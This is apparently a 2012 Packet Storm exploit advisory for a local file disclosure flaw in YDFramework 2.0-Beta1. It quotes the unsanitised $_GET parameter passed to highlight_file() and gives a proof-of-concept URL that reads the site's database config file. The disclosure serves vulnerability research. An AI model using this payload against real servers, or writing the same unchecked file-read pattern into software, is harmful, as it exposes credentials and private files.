YDFramework 2.0-Beta1 File Disclosure

2012-05-23T00:00:00
ID PACKETSTORM:112998
Type packetstorm
Reporter L3b-r1'z
Modified 2012-05-23T00:00:00

Description

                                        
                                            `# Author : L3b-r1'z  
# Site : Exploit4arab.com  
# Title : YDFramework-2.0-beta1 Local File Disclosure  
# Downalod : http://developer.berlios.de/project/showfiles.php?group_id=3988&release_id=6710  
# Google Dork : N/A  
  
<-- Info Of This fuckin Sploit :P :  
  
This Exploit You Can Read Any File's In The Site  
  
Look To The File Named Index.php On Line 26 :  
  
$file = $_GET['id'];  
  
And Line 46 :  
  
highlight_file($file);  
  
So This Function Highlight_File Like Show_source or Readfile :D  
  
It's Danger Func -->  
  
# P0c :  
http://localhost/index.php?id=./database/config.php  
  
# Greet'z : All My Friend's , And Exploit4arab Visitor's :P  
  
  
  
--   
Proud To Be Lebanese :D  
  
I Will Miss You My Friends : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The  
Injector, N4ss1m, Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The  
Viper, Th3 Killer Dz, Over-X <3, And All My Friends.  
  
Sec4ever.com.  
`